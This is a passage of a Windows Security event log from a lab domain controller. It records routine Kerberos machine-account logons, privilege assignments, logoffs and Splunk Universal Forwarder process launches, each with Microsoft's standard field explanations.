The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:19:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263664
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73FAB4
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:19:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263663
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x73FA42
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 59941
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:19:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263662
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73FA42
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:19:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263661
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x73F9FA
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:19:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263660
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73F9FA
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:19:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263659
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x73F90C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59940
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:19:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263658
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73F90C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:19:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263669
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x12dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:19:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263671
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x374
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:19:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263670
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x8e0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:19:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263672
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1be4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:19:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263673
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xe08
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:19:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263675
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1784
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:19:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263674
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1518
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:19:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263676
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73FAB4
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:19:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263679
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x743438
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:19:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263678
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x743438
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59953
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:19:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263677
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x743438
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:20:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263681
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1160
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:20:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263680
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1848
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:20:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263682
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x650
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:20:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263683
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf54
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:20:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263684
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15a8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:20:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263686
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
